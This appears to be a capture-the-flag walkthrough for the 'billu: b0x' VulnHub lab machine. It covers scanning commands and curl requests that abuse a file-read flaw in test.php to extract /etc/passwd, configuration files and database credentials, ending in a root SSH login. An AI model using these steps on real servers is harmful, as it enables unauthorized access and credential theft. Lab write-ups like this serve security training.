billu: b0x

 

netdiscover -r x.x.x.0/24

 

nmap <IP of billu>

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

 

nmap -p 1-65535 -T4 -A -v <IP of billu>

nmap -p- -A <IP of billu>

nmap -T4 -A -v -p- <IP of billu>

nmap -sSV -n -Pn <IP of billu> -T5

 

nikto -h http://<IP of billu>

 

dirb http://<IP of billu>

 

Dirb finds a couple interesting directories /add, /show and /test

 

We also want to run a Dirb scan with big.txt for wordlist:
dirb http://<IP of billu> /usr/share/wordlists/dirb/big.txt

or

dirb http://<IP of billu> /usr/share/dirb/wordlists/big.txt

or

dirb http://<IP of billu> /opt/wordlists/SecLists/Discovery/Web_Content/big.txt

or just

locate big.txt

 

From these Dirb results we see there is a phpmyadmin in the /phpmy/ directory. http://<IP of billu>/phpmy/phpmyadmin

 

So, naviagting to http://<IP of billu>/phpmy/ sends us to the phpMyAdmin login page.

But, root:<blank> doesn't work.

 

Navigating to http://<IP of billu>/test gives us the error:
'file' parameter is empty. Please provide file path in 'file' parameter

 

So, from this output, we can determine that /test.php reads a parameter called file and get read access of the server, so let's pass it using curl:

 

curl -X POST -F 'file=/etc/issue' http://<IP of billu>/test.php

Ubuntu 12.04.5 LTS \n \l

 

Now, let's try to extract the phpmyadmin's config file. We can use BurpSuite or curl to change the HTTP method from GET to POST.

(Note: for BurpSuite methods go here: https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/)

(Note: We no longer really care about the phpmyadmin backend credentials if we can exploit the SQLi.)

 

curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://<IP of billu>/test.php

Here, we get the creds root:roottoor

 

We can try these creds with SSH:

ssh root@<IP of billu>

or

ssh <IP of billu>

But we get a WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! error

So:

ssh-keygen -f "/root/.ssh/known_hosts" -R <IP of billu>

 

whoami

root

:))))))))~~~~~~~~~~~~~

 

 

Note: These creds do not work on the phpmyadmin login, duh...

___________________________________________________________

 

To go the PHPMY ADMIN route:

 

We can also extract the user list /etc/passwd/ file:

curl -X POST --data "file=/etc/passwd" http://<IP of billu>/test.php

 

Let's also extract index.php:

curl -X POST --data "file=index.php" http://<IP of billu>/test.php

At the top of this output we see the inclusion of two files, c.php and head.php. Also, we see login authentication is using an auth table in the database:
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';

 

Now, let's open the c.php file:
curl -X POST --data "file=c.php" http://<IP of billu>/test.php

This reveals the credentials of the phpmyadmin page:
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

So the creds to phphmyadmin are billu:b0x_billu

 

Go here to finish rooting this the phpmyadmin way!: https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/